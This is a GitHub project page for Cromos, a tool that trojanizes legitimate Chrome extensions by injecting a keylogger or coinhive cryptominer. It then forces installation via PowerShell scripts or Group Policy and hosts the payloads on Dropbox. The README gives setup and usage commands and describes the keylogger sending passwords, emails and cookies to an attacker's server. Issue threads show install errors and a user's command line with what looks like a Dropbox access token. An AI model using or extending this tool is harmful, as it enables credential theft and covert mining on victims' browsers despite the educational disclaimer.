jimywork / cromos Goto Github PK

Cromos is a tool for downloading legitimate extensions of the Chrome Web Store and inject codes in the background of the application.

Home Page: https://twitter.com/6IX7ine

Python 91.19% PowerShell 1.22% JavaScript 7.59%

chrome linux windows python chrome-extension web-store keylogger dropbox injection force-installation

cromos's Introduction

Cromos

Cromos is a tool for downloading legitimate extensions of the Chrome Web Store and inject codes in the background of the application and more cromos create executable files to force installation via PowerShell for example, and also upload files to dropbox to host the malicious files.

Download extension
Injections
Upload files on dropbox
Windows infection

Demo

This is a demonstration of the tool at work in this examples I'm downloading a famous Google extension called G Suite Training on Google Chrome Web Store and injecting a keylogger module.

Installation

$ cd $HOME/
$ git clone https://github.com/fbctf/cromos
$ sudo chmod -R 777 cromos/
$ cd cromos && python setup.py

Usage

Downloading the extension

Usage: python cromos.py --extension {id}

Downloading the extension and loading module

Usage: python cromos.py --extension {id} --load {currency/keylogger}

Build a batch file and upload the files in dropbox

Usage: python cromos.py --extension {id} --build {bat} --token {dropboxToken}

Modules

You can also inject some predefined modules in the background as keylogger, virtual currency.

Module	Description
modules/keylogger	This module captures all the passwords you type in an infected browser over https or not. All you need is to have a php server for example to receive the requests get the parameters are email, password, cookies and userAgent.
modules/currency	This module allows you to mine virtual coins using the coinhive API, you just need to have an account.

Group Policy Object (GPO)

Chrome allows you to add extensions using Windows Group Policy Object (GPO) if you need to force installation on multiple machines just follow the steps in the Chrome Deployment Guide then modify the original extension with few modifications you can publish your extension in the Chrome Web Store requires to pay $5.

Disclaimer

Code samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.

Donations

XMR: 49m12JEEC6HPCHkLMX5QL4SrDQdKwh6eb4Muu8Z9CwA9MwemhzFQ3VcgHwyuR73rC22WCymTUyep7DVrfN3GPt5JBCekPrR

cromos's People

Contributors

Stargazers

Watchers

cromos's Issues

when i select 1) Download/select an extension i got this error

Traceback (most recent call last):
File "cromos.py", line 5, in
from libs.download import Download
File "/root/cromos/libs/download.py", line 12, in
from libs.build import Build
File "/root/cromos/libs/build.py", line 4, in
from drive import Drive
File "/root/cromos/libs/drive.py", line 9, in
import dropbox
ImportError: No module named dropbox

js code injection

Hello.How can I inject my js code in the same way?

error with dropbox

i get this error when i tried to put drop box token
The extension has already been downloaded
Traceback (most recent call last):
File "cromos.py", line 75, in
main()
File "cromos.py", line 70, in main
Build(extension, builds, token).builder()
File "/root/Desktop/cromos/libs/build.py", line 66, in builder
paths = Drive(self.extension, self.filetype, self.token).ShareLinks()
File "/root/Desktop/cromos/libs/drive.py", line 158, in ShareLinks
paths = self.drive.files_list_folder("/{}".format(self.extension))
File "/usr/local/lib/python2.7/dist-packages/dropbox/base.py", line 715, in files_list_folder
None,
File "/usr/local/lib/python2.7/dist-packages/dropbox/dropbox.py", line 234, in request
timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/dropbox/dropbox.py", line 325, in request_json_string_with_retry
timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/dropbox/dropbox.py", line 409, in request_json_string
timeout=timeout,
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 518, in post
return self.request('POST', url, data=data, json=json, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 475, in request
resp = self.send(prep, **send_kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 585, in send
r = adapter.send(request, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 403, in send
timeout=timeout
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 581, in urlopen
timeout_obj = self._get_timeout(timeout)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 307, in _get_timeout
return Timeout.from_float(timeout)
File "/usr/lib/python2.7/dist-packages/urllib3/util/timeout.py", line 157, in from_float
return Timeout(read=timeout, connect=timeout)
File "/usr/lib/python2.7/dist-packages/urllib3/util/timeout.py", line 97, in init
self._connect = self._validate_timeout(connect, 'connect')
File "/usr/lib/python2.7/dist-packages/urllib3/util/timeout.py", line 130, in _validate_timeout
"int, float or None." % (name, value))
ValueError: Timeout value connect was Timeout(connect=30, read=30, total=None), but it must be an int, float or None.

setup.py

hi .. lauching

python setup.py

it give me this error:

Unable to install requests using pip. Please read the instructions for manual installation.. Exiting
Error: 'module' object has no attribute 'main'
Unable to install dropbox using pip. Please read the instructions for manual installation.. Exiting
Error: 'module' object has no attribute 'main'

if i try to do:

pip install requirements.txt

Collecting requirements.txt
Could not find a version that satisfies the requirement requirements.txt (from versions: )
No matching distribution found for requirements.txt

THNX!!!!

JS Keylogger Source Code

Please make open without encoding the js keylogger source code :)

where did i get it wrong?

python cromos.py --extension ahmpjcflkgiildlgicmcieglgoilbfdp --build bat --token ZJdSSjU9EFAAAAAAAAAACnpp-vC1ejBUTmLkkyClxJ-A2jOFHrlBB2oyWK

     (         )      *         )    (

( )\ ) ( /( ( ` ( /( )\ )
)\ (()/( )()) )))( )()) (()/(
((() /()) (()\ (()()\ (()\ /())
)___ ()) (() (()(() (() ())
((/ | | _ \ / _ \ | / | / _ \ / |
| ( | / | () | | |/| | | () | __ \
_| ||\ _/ || || _/ |___/

  Version: 1.0 Builds: 1 Modules: 2

[!] The extension has already been downloaded
[!] First upload the files to get shared links
[+] Upload files in dropbox
Traceback (most recent call last):
File "cromos.py", line 75, in
main()
File "cromos.py", line 71, in main
Drive(extension, builds, token).upload()
File "/root/Desktop/cromos/libs/drive.py", line 71, in upload
raise e
ValueError: Timeout value connect was Timeout(connect=30, read=30, total=None), but it must be an int, float or None.